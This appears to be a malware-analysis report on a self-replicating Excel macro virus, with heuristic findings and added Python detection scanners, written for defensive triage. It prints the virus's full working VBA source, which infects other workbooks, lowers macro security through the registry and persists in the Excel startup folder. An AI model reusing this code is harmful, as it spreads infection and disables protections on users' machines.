Verdict: MALICIOUS
Risk Score: 524

Malware Insights

MITRE ATT&CK:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
- T1203 Exploitation for Client Execution
The file is an OLE-based .xls workbook that carries both a VBA project and an Excel 4.0 (XLM) macro sheet; its VBA runs from Workbook_Open (ThisWorkbook) and Auto_Open (module echo). The decoded source contains no download or second-stage logic: it is a self-replicating macro virus. Auto_Open, which fires in a workbook that has just received the echo module, rewrites the ThisWorkbook module through the VBE object model (DeleteLines, then InsertLines of a Workbook_open handler and an Application-level WithEvents hook), adds a very-hidden Excel 4.0 macro sheet named Macro1, registers a sheet-scoped Auto_Activate name on every sheet pointing at Macro1!$A$2, and saves (MoveMacro4). That XLM code conditionally shows an ALERT reading "禁用宏,关闭 ... Please Enable Macro!" ("macros disabled, closing") and closes the file with FILE.CLOSE(FALSE); this is the enable-content lure the XLM heuristics report. Workbook_Open calls Do_What, which, when the workbook is not already in Application.StartupPath: unhides the sheets and deletes the active sheet if A1:F15 contains "CONFIDENTIAL" (RestoreAfterOpen, the decoy content); writes AccessVBOM=1 and Security\Level=1 under both HKCU and HKLM for the running Office version through WScript.Shell.RegWrite (OpenDoor), which grants trusted access to the VBA project object model and sets the legacy macro security level to Low (the HKLM writes fail silently for a non-administrator because of On Error Resume Next); strips the system and hidden attributes from, and deletes, any existing echo.XLS in the startup folder through cmd.exe, then saves itself there as an add-in (IsAddin = True, SaveCopyAs) so it loads on every Excel start (Microsofthobby); and runs explorer with the URI tencent://message/?uin=654486740, which opens a QQ chat to that account (Hacking). The xx_workbookOpen handler then adds the VBA Extensibility 5.3 reference (GUID 0002E157-0000-0000-C000-000000000046) to every workbook opened afterwards and copies the echo module into it from echo.xls via Export to %TEMP%\echo.bas and Import (CopyStart/CopyModule), skipping projects whose protection is vbext_pp_locked. The T1203 mapping is not supported by the recovered source: execution depends on the user enabling macros, not on a client-side exploit. The ClamAV detection Xls.Malware.Mailcab-6776806-0 is consistent with this verdict.
Heuristics (13)

- ClamAV: Xls.Malware.Mailcab-6776806-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Xls.Malware.Mailcab-6776806-0
- XLM Auto_Open workbook with payload URL or enable-content lure (critical, OLE_XLM_AUTOOPEN_PAYLOAD_LURE): Workbook contains an Excel 4.0 macro sheet with Auto_Open / Auto_Close and also exposes a payload URL or enable-content lure in the OLE bytes. This combination is a high-confidence XLM downloader/social-engineering pattern even when formula recovery cannot decode the full macro chain.
- Excel 4.0 (XLM) Auto_Open + macro sheet (critical, OLE_XLM_AUTOOPEN): Workbook contains an Auto_Open / Auto_Close defined name together with an Excel 4.0 macro sheet, the canonical XLM auto-execution shape used by malware families such as Emotet and QakBot.
- VBA macros detected (medium, OLE_VBA_MACROS, 8 related findings): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL). Matched line in script: `Shell Environ$("comspec") & " /c attrib -S -h """ & Application.StartupPath & "\echo.XLS""", vbMinimizedFocus`
- WScript.Shell usage (critical, OLE_VBA_WSCRIPT). Matched line in script: `Set oWshell = CreateObject("WScript.Shell")`
- VBA macro-virus self-replication / AV tampering (critical, OLE_VBA_MACRO_VIRUS_REPLICATION): VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family: self-replicating code with no benign document use, independent of any AV signature. Matched line in script: `.InsertLines 1, "Public WithEvents xx As Application"`
- CreateObject call (high, OLE_VBA_CREATEOBJ). Matched line in script: `Set Fso = CreateObject("scRiPTinG.fiLEsysTeMoBjEcT")`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Workbook_Open macro (low, OLE_VBA_WBOPEN). Matched line in script: `Private Sub Workbook_open()`
- Auto_Open macro (low, OLE_VBA_AUTO). Matched line in script: `Private Sub Auto_Open()`
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON). Matched line in script: `FName = Environ("Temp") & "\" & ModuleName & ".bas"`
- Reference to Windows Script Host (high, SC_STR_WSCRIPT)
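To make the VBA heuristics above reproducible outside the analyzer, here is an added example (my own code, not the analyzer's rule engine) that runs the same kind of indicator scan over decoded VBA source and then applies the macro-virus test the self-replication heuristic describes: code rewriting through the VBE object model plus a spread vector. The input is a constructed excerpt of the statements from the macros.bas preview on this page; the rule identifiers, severities and the `classify()` threshold are my own choices and are not the analyzer's.

```python
"""Indicator scan for the self-replicating Excel macro-virus pattern in decoded VBA source."""
import re

# Constructed sample input: statements copied from the decoded macros.bas preview on
# this page, trimmed to the lines that carry behaviour (not the full module).
SAMPLE_VBA = r'''
Public WithEvents xx As Application
Private Sub xx_workbookOpen(ByVal wb As Workbook)
wb.VBProject.References.AddFromGuid GUID:="{0002E157-0000-0000-C000-000000000046}", Major:=5, Minor:=3
.InsertLines 1, "Public WithEvents xx As Application"
.DeleteLines 1, .CountOfLines
FromVBProject.VBComponents(ModuleName).Export FileName:=FName
ToVBProject.VBComponents.Import FileName:=FName
Set Fso = CreateObject("scRiPTinG.fiLEsysTeMoBjEcT")
RK1 = "HKEY_CURRENT_USER\Software\Microsoft\Office\" & VS & "\Excel\Security\AccessVBOM"
RK2 = "HKEY_CURRENT_USER\Software\Microsoft\Office\" & VS & "\Excel\Security\Level"
Set oWshell = CreateObject("WScript.Shell")
oWshell.RegWrite strkey, Value, ValueType
Shell Environ$("comspec") & " /c attrib -S -h """ & Application.StartupPath & "\echo.XLS""", vbMinimizedFocus
MyFile = Application.StartupPath & "\echo.xls"
ThisWorkbook.IsAddin = True
ThisWorkbook.SaveCopyAs MyFile
Sheets.Add Type:=xlExcel4MacroSheet
wb.Names.Add sht.Name & "!Auto_Activate", "=Macro1!$A$2", False
wb.Excel4MacroSheets(1).Visible = xlSheetVeryHidden
'this's hacking code
Shell "explorer tencent://message/?uin=654486740"
'''

# (rule id, severity, regex, what a hit means). VBA is case-insensitive and the sample
# case-mangles ProgIDs, so every pattern is compiled with re.IGNORECASE. Names are mine.
RULES = [
    ("VBE_SELF_MODIFY", "critical",
     r"\.(InsertLines|DeleteLines|AddFromString)\b|\bVBComponents\b.*\.(Import|Export|Remove)\b|\bOrganizerCopy\b",
     "rewrites VBA project code through the VBE object model"),
    ("VBIDE_REFERENCE", "high", r"References\.AddFromGuid|0002E157-0000-0000-C000-000000000046",
     "adds the VBA Extensibility 5.3 reference needed for VBProject access"),
    ("APP_EVENT_HOOK", "critical", r"\bWithEvents\b\s+\w+\s+As\s+Application\b|\b\w+_WorkbookOpen\b",
     "hooks Application-level WorkbookOpen so each opened workbook can be infected"),
    ("OFFICE_SECURITY_REGWRITE", "critical", r"Office\\.*\\Security\\(AccessVBOM|Level)\b|\.RegWrite\b",
     "writes Office macro-security registry values (AccessVBOM / Level)"),
    ("STARTUP_PERSIST", "high", r"Application\.StartupPath|\.IsAddin\s*=\s*True|\.SaveCopyAs\b",
     "drops a copy into the Excel startup folder or saves itself as an add-in"),
    ("XLM_OR_AUTOEXEC", "high",
     r"xlExcel4MacroSheet|Excel4MacroSheets|\bAuto_(Open|Close|Activate|Deactivate)\b|xlSheetVeryHidden",
     "creates or hides an Excel 4.0 macro sheet, or defines an auto-exec name"),
    # lookbehind keeps "WScript.Shell" and "oWshell" from counting as a Shell() call
    ("SHELL_EXEC", "critical", r"(?<![.\w])Shell\b", "Shell() call, here cmd.exe via %comspec% and explorer"),
    ("COM_OBJECT", "high", r'CreateObject\s*\(\s*"(WScript\.Shell|Scripting\.FileSystemObject)"',
     "instantiates WScript.Shell / FileSystemObject (case-mangled ProgIDs still match)"),
    ("URI_LAUNCH", "medium", r"\b[a-z][a-z0-9+.-]{1,15}://", "passes a URI scheme to an external handler"),
]
COMPILED = [(rid, sev, re.compile(pat, re.IGNORECASE), meaning) for rid, sev, pat, meaning in RULES]


def scan_vba(source: str) -> dict:
    """Return {rule_id: {"severity", "meaning", "lines": [(lineno, text), ...]}} for rules that hit."""
    findings = {}
    for lineno, line in enumerate(source.splitlines(), 1):
        text = line.strip()
        if not text or text.startswith("'"):  # skip blanks and VBA comment lines
            continue
        for rule_id, severity, rx, meaning in COMPILED:
            if rx.search(text):
                hit = findings.setdefault(rule_id, {"severity": severity, "meaning": meaning, "lines": []})
                hit["lines"].append((lineno, text))
    return findings


def classify(findings: dict) -> str:
    """Self-replication needs code rewriting plus a spread vector (event hook or startup drop)."""
    spread = {"APP_EVENT_HOOK", "STARTUP_PERSIST"}
    if "VBE_SELF_MODIFY" in findings and spread.intersection(findings):
        return "macro-virus"
    if any(f["severity"] == "critical" for f in findings.values()):
        return "suspicious"
    return "no critical indicators"


if __name__ == "__main__":
    hits = scan_vba(SAMPLE_VBA)
    print("verdict:", classify(hits))
    for rule_id, hit in hits.items():
        print(f"[{hit['severity']}] {rule_id}: {hit['meaning']}")
        for lineno, text in hit["lines"]:
            print(f"    {lineno:>3}: {text}")
```

Feed it the output of `olevba --decode` (or the macros.bas artifact below) instead of `SAMPLE_VBA` to scan a real sample. The classification deliberately requires two independent behaviours so that a lone `InsertLines` in a legitimate code generator does not trip it; a hit on `OFFICE_SECURITY_REGWRITE` together with `STARTUP_PERSIST` is the pair worth alerting on in a SOC rule even when no replication is visible.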
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11236 bytes |

SHA-256 (macros.bas): a97fdf84284e8f853769e6a7ce10ef531b9a8a438f6e8f24f2aa953bcd52b456

Preview of the extracted script (first 1,000 lines of macros.bas):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Public WithEvents xx As Application
Attribute xx.VB_VarHelpID = -1
Private Sub Workbook_open()
Set xx = Application
On Error Resume Next
Application.DisplayAlerts = False
Call Do_What
End Sub
Private Sub xx_workbookOpen(ByVal wb As Workbook)
On Error Resume Next
wb.VBProject.References.AddFromGuid _
GUID:="{0002E157-0000-0000-C000-000000000046}", _
Major:=5, Minor:=3
Application.ScreenUpdating = False
Application.DisplayAlerts = False
CopyStart wb
Application.ScreenUpdating = True
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "echo"
Private Sub Auto_Open()
Application.DisplayAlerts = False
If ThisWorkbook.Path <> Application.StartupPath Then
Application.ScreenUpdating = False
Call Delete_This_WK
Call CopyToWorkBook
If Sheets(1).Name <> "Macro1" Then MoveMacro4 ThisWorkbook
ThisWorkbook.Save
Application.ScreenUpdating = True
End If
End Sub
Private Sub CopyToWorkBook()
Const DQUOTE = """"
With ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule
.InsertLines 1, "Public WithEvents xx As Application"
.InsertLines 2, "Private Sub Workbook_open()"
.InsertLines 3, "Set xx = Application"
.InsertLines 4, "On Error Resume Next"
.InsertLines 5, "Application.DisplayAlerts = False"
.InsertLines 6, "Call Do_What"
.InsertLines 7, "End Sub"
.InsertLines 8, "Private Sub xx_workbookOpen(ByVal wb As Workbook)"
.InsertLines 9, "On Error Resume Next"
.InsertLines 10, "wb.VBProject.References.AddFromGuid _"
.InsertLines 11, "GUID:=" & DQUOTE & "{0002E157-0000-0000-C000-000000000046}" & DQUOTE & ", _"
.InsertLines 12, "Major:=5, Minor:=3"
.InsertLines 13, "Application.ScreenUpdating = False"
.InsertLines 14, "Application.DisplayAlerts = False"
.InsertLines 15, "CopyStart wb"
.InsertLines 16, "Application.ScreenUpdating = True"
.InsertLines 17, "End Sub"
End With
End Sub
Private Sub Delete_This_WK()
Dim VBProj As VBIDE.VBProject
Dim VBComp As VBIDE.VBComponent
Dim CodeMod As VBIDE.CodeModule
Set VBProj = ThisWorkbook.VBProject
Set VBComp = VBProj.VBComponents("ThisWorkbook")
Set CodeMod = VBComp.CodeModule
With CodeMod
.DeleteLines 1, .CountOfLines
End With
End Sub
Function Do_What()
Attribute Do_What.VB_ProcData.VB_Invoke_Func = " \n14"
If ThisWorkbook.Path <> Application.StartupPath Then
RestoreAfterOpen
Call OpenDoor
Call Microsofthobby
Call Hacking
End If
End Function
Function CopyStart(ByVal wb As Workbook)
Attribute CopyStart.VB_ProcData.VB_Invoke_Func = " \n14"
On Error Resume Next
Dim VBProj1 As VBIDE.VBProject
Dim VBProj2 As VBIDE.VBProject
Set VBProj1 = Workbooks("echo.xls").VBProject
Set VBProj2 = wb.VBProject
If CopyModule("echo", VBProj1, VBProj2, False) Then Exit Function
End Function
Function CopyModule(ModuleName As String, _
FromVBProject As VBIDE.VBProject, _
ToVBProject As VBIDE.VBProject, _
OverwriteExisting As Boolean) As Boolean
Attribute CopyModule.VB_ProcData.VB_Invoke_Func = " \n14"
On Error Resume Next
Dim VBComp As VBIDE.VBComponent
Dim FName As String
Dim CompName As String
Dim S As String
Dim SlashPos As Long
Dim ExtPos As Long
Dim TempVBComp As VBIDE.VBComponent
If FromVBProject Is Nothing Then
CopyModule = False
Exit Function
End If
If Trim(ModuleName) = vbNullString Then
CopyModule = False
Exit Function
End If
If ToVBProject Is Nothing Then
CopyModule = False
Exit Function
End If
If FromVBProject.Protection = vbext_pp_locked Then
CopyModule = False
Exit Function
End If
If ToVBProject.Protection = vbext_pp_locked Then
CopyModule = False
Exit Function
End If
On Error Resume Next
Set VBComp = FromVBProject.VBComponents(ModuleName)
If Err.Number <> 0 Then
CopyModule = False
Exit Function
End If
FName = Environ("Temp") & "\" & ModuleName & ".bas"
If OverwriteExisting = True Then
If Dir(FName, vbNormal + vbHidden + vbSystem) <> vbNullString Then
Err.Clear
Kill FName
If Err.Number <> 0 Then
CopyModule = False
Exit Function
End If
End If
With ToVBProject.VBComponents
.Remove .Item(ModuleName)
End With
Else
Err.Clear
Set VBComp = ToVBProject.VBComponents(ModuleName)
If Err.Number <> 0 Then
If Err.Number = 9 Then
Else
CopyModule = False
Exit Function
End If
End If
End If
FromVBProject.VBComponents(ModuleName).Export FileName:=FName
SlashPos = InStrRev(FName, "\")
ExtPos = InStrRev(FName, ".")
CompName = Mid(FName, SlashPos + 1, ExtPos - SlashPos - 1)
Set VBComp = Nothing
Set VBComp = ToVBProject.VBComponents(CompName)
If VBComp Is Nothing Then
ToVBProject.VBComponents.Import FileName:=FName
Else
If VBComp.Type = vbext_ct_Document Then
Set TempVBComp = ToVBProject.VBComponents.Import(FName)
With VBComp.CodeModule
.DeleteLines 1, .CountOfLines
S = TempVBComp.CodeModule.Lines(1, TempVBComp.CodeModule.CountOfLines)
.InsertLines 1, S
End With
On Error GoTo 0
ToVBProject.VBComponents.Remove TempVBComp
End If
End If
Kill FName
CopyModule = True
End Function
Function Microsofthobby()
Attribute Microsofthobby.VB_ProcData.VB_Invoke_Func = " \n14"
Dim myfile0 As String
Dim MyFile As String
On Error Resume Next
myfile0 = ThisWorkbook.FullName
MyFile = Application.StartupPath & "\echo.xls"
If WorkbookOpen("echo.xls") And ThisWorkbook.Path <> Application.StartupPath Then Workbooks("echo.xls").Close False
Shell Environ$("comspec") & " /c attrib -S -h """ & Application.StartupPath & "\echo.XLS""", vbMinimizedFocus
Shell Environ$("comspec") & " /c Del /F /Q """ & Application.StartupPath & "\echo.XLS""", vbMinimizedFocus
Shell Environ$("comspec") & " /c RD /S /Q """ & Application.StartupPath & "\echo.XLS""", vbMinimizedFocus
If ThisWorkbook.Path <> Application.StartupPath Then
Application.ScreenUpdating = False
ThisWorkbook.IsAddin = True
ThisWorkbook.SaveCopyAs MyFile
ThisWorkbook.IsAddin = False
Application.ScreenUpdating = True
End If
End Function
Function OpenDoor()
Attribute OpenDoor.VB_ProcData.VB_Invoke_Func = " \n14"
Dim Fso, RK1 As String, RK2 As String, RK3 As String, RK4 As String
Dim KValue1 As Variant, KValue2 As Variant
Dim VS As String
On Error Resume Next
VS = Application.Version
Set Fso = CreateObject("scRiPTinG.fiLEsysTeMoBjEcT")
RK1 = "HKEY_CURRENT_USER\Software\Microsoft\Office\" & VS & "\Excel\Security\AccessVBOM"
RK2 = "HKEY_CURRENT_USER\Software\Microsoft\Office\" & VS & "\Excel\Security\Level"
RK3 = "HKEY_LOCAL_MACHINE\Software\Microsoft\Office\" & VS & "\Excel\Security\AccessVBOM"
RK4 = "HKEY_LOCAL_MACHINE\Software\Microsoft\Office\" & VS & "\Excel\Security\Level"
KValue1 = 1
KValue2 = 1
Call WReg(RK1, KValue1, "REG_DWORD")
Call WReg(RK2, KValue2, "REG_DWORD")
Call WReg(RK3, KValue1, "REG_DWORD")
Call WReg(RK4, KValue2, "REG_DWORD")
End Function
Sub WReg(strkey As String, Value As Variant, ValueType As String)
Attribute WReg.VB_ProcData.VB_Invoke_Func = " \n14"
Dim oWshell
Set oWshell = CreateObject("WScript.Shell")
If ValueType = "" Then
oWshell.RegWrite strkey, Value
Else
oWshell.RegWrite strkey, Value, ValueType
End If
Set oWshell = Nothing
End Sub
Private Sub MoveMacro4(ByVal wb As Workbook)
On Error Resume Next
Dim sht As Object
wb.Sheets(1).Select
Sheets.Add Type:=xlExcel4MacroSheet
ActiveSheet.Name = "Macro1"
Range("A2").Select
ActiveCell.FormulaR1C1 = "=ERROR(FALSE)"
Range("A3").Select
ActiveCell.FormulaR1C1 = "=IF(ERROR.TYPE(RUN(""" & Application.UserName & """))=4)"
Range("A4").Select
ActiveCell.FormulaR1C1 = "=ALERT(""禁用宏,关闭 " & Chr(10) & Now & Chr(10) & "Please Enable Macro!"",3)"
Range("A5").Select
ActiveCell.FormulaR1C1 = "=FILE.CLOSE(FALSE)"
Range("A6").Select
ActiveCell.FormulaR1C1 = "=END.IF()"
Range("A7").Select
ActiveCell.FormulaR1C1 = "=RETURN()"
For Each sht In wb.Sheets
wb.Names.Add sht.Name & "!Auto_Activate", "=Macro1!$A$2", False
Next
wb.Excel4MacroSheets(1).Visible = xlSheetVeryHidden
End Sub
Private Function WorkbookOpen(WorkBookName As String) As Boolean
WorkbookOpen = False
On Error GoTo WorkBookNotOpen
If Len(Application.Workbooks(WorkBookName).Name) > 0 Then
WorkbookOpen = True
Exit Function
End If
WorkBookNotOpen:
End Function
Private Function RestoreAfterOpen()
Dim sht, del_sht, rng, del_frag As Boolean
On Error Resume Next
del_sht = ActiveSheet.Name
Application.ScreenUpdating = False
Application.DisplayAlerts = False
For Each sht In ThisWorkbook.Sheets
If sht.Name <> "Macro1" Then sht.Visible = xlSheetVisible
Next
For Each rng In Sheets(del_sht).Range("A1:F15")
If InStr(rng.Value, "CONFIDENTIAL") > 0 Then
del_frag = True
Exit For
End If
Next
If del_frag = True Then Sheets(del_sht).Delete
Application.ScreenUpdating = True
End Function
Private Sub Hacking()
'this's hacking code
Shell "explorer tencent://message/?uin=654486740"
End Sub
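The XLM heuristics (OLE_XLM_AUTOOPEN, OLE_XLM_AUTOOPEN_PAYLOAD_LURE) and the MoveMacro4 routine in the script above both come down to two BIFF8 structures: BoundSheet8 records, which carry each sheet's type and hidden state, and Lbl records, in which built-in names such as Auto_Open and Auto_Activate are stored as a one-byte index rather than as text. This added example (my own code, not the analyzer's) parses both from a raw Workbook stream. It assumes you have already pulled that stream out of the OLE container (for instance `olefile.OleFileIO(path).openstream("Workbook").read()`), handles BIFF8 only, does not merge CONTINUE records, and runs against a constructed stream shaped like the one MoveMacro4 produces: a visible worksheet, a very-hidden "Macro1" macro sheet, a sheet-scoped Auto_Activate name per sheet, and a global Auto_Open. The BOF payload and the PtgRef3d formula bytes in the builder are constructed for the sample.

```python
"""Find Excel 4.0 macro sheets and built-in auto-exec names in a raw BIFF8 Workbook stream."""
import struct

BOUNDSHEET, LBL, BOF, EOF = 0x0085, 0x0018, 0x0809, 0x000A
# Built-in defined-name indexes (MS-XLS Lbl record with fBuiltin set).
BUILTIN_NAMES = {0x01: "Auto_Open", 0x02: "Auto_Close", 0x0A: "Auto_Activate", 0x0B: "Auto_Deactivate"}
SHEET_STATE = {0: "visible", 1: "hidden", 2: "very hidden"}
SHEET_KIND = {0x00: "worksheet", 0x01: "xlm macro sheet", 0x02: "chart", 0x06: "vba module"}


def iter_records(stream: bytes):
    """Yield (record id, payload) for each BIFF record; CONTINUE records are not merged."""
    off = 0
    while off + 4 <= len(stream):
        rid, length = struct.unpack_from("<HH", stream, off)
        off += 4
        yield rid, stream[off:off + length]
        off += length


def _read_name(data: bytes, off: int, cch: int) -> str:
    """XLUnicodeStringNoCch at off: one flags byte (bit 0 = UTF-16LE), then cch characters."""
    high = data[off] & 1
    raw = data[off + 1:off + 1 + (cch * 2 if high else cch)]
    return raw.decode("utf-16-le" if high else "latin-1")


def scan_workbook_stream(stream: bytes) -> dict:
    """Collect sheets and defined names, then flag XLM sheets paired with an auto-exec name."""
    sheets, names = [], []
    for rid, data in iter_records(stream):
        if rid == BOUNDSHEET:
            # lbPlyPos(4) hsState(1) dt(1) then ShortXLUnicodeString: cch(1) flags(1) chars
            hs, dt, cch = data[4] & 0x03, data[5], data[6]
            sheets.append({"name": _read_name(data, 7, cch),
                           "state": SHEET_STATE.get(hs, "?"),
                           "kind": SHEET_KIND.get(dt, hex(dt))})
        elif rid == LBL:
            # flags(2) chKey(1) cch(1) cce(2) reserved(2) itab(2) reserved(4) Name rgce
            flags, _key, cch, _cce, _r3, itab, _r4 = struct.unpack_from("<HBBHHHI", data, 0)
            if flags & 0x0020:  # fBuiltin: the name body is a single index byte
                name = BUILTIN_NAMES.get(data[15], "builtin_%#x" % data[15])
            else:
                name = _read_name(data, 14, cch)
            # itab 0 = workbook-global, otherwise 1-based sheet index; flag bit 0 = hidden name
            names.append({"name": name, "scope": itab, "hidden": bool(flags & 0x0001)})
    xlm = [s for s in sheets if s["kind"] == "xlm macro sheet"]
    auto = [n for n in names if n["name"] in BUILTIN_NAMES.values()]
    verdict = "xlm auto-exec" if xlm and auto else ("xlm sheet" if xlm else "none")
    return {"sheets": sheets, "names": names, "xlm_sheets": xlm,
            "auto_exec_names": auto, "verdict": verdict}


# --- constructed sample stream (not a real file) ----------------------------------
def _rec(rid: int, payload: bytes) -> bytes:
    return struct.pack("<HH", rid, len(payload)) + payload


def _boundsheet(name: str, state: int, kind: int) -> bytes:
    return _rec(BOUNDSHEET, struct.pack("<IBB", 0, state, kind)
                + bytes([len(name), 0]) + name.encode("latin-1"))


def _builtin_lbl(index: int, itab: int) -> bytes:
    rgce = bytes([0x3A]) + struct.pack("<HHH", 0, 1, 0)  # PtgRef3d: row 2, column A ($A$2 shape)
    header = struct.pack("<HBBHHHI", 0x0020, 0, 1, len(rgce), 0, itab, 0)
    return _rec(LBL, header + bytes([0, index]) + rgce)


# Globals substream shaped like what MoveMacro4 builds: a visible worksheet, a very-hidden
# "Macro1" XLM sheet, one sheet-scoped Auto_Activate per sheet, plus a global Auto_Open.
SAMPLE_STREAM = (
    _rec(BOF, struct.pack("<HH", 0x0600, 0x0005) + bytes(12))
    + _boundsheet("Sheet1", 0, 0x00)
    + _boundsheet("Macro1", 2, 0x01)
    + _builtin_lbl(0x0A, 1) + _builtin_lbl(0x0A, 2) + _builtin_lbl(0x01, 0)
    + _rec(EOF, b"")
)

if __name__ == "__main__":
    result = scan_workbook_stream(SAMPLE_STREAM)
    print("verdict:", result["verdict"])
    for s in result["xlm_sheets"]:
        print("XLM sheet:", s)
    for n in result["auto_exec_names"]:
        print("auto-exec name:", n)
```

Because this reads the sheet table and the name table directly, it still fires when the XLM formulas themselves cannot be recovered, which is the point the OLE_XLM_AUTOOPEN_PAYLOAD_LURE description makes. A very-hidden macro sheet (hsState 2) is not reachable from the Excel UI at all, so that state alone is worth a finding in triage.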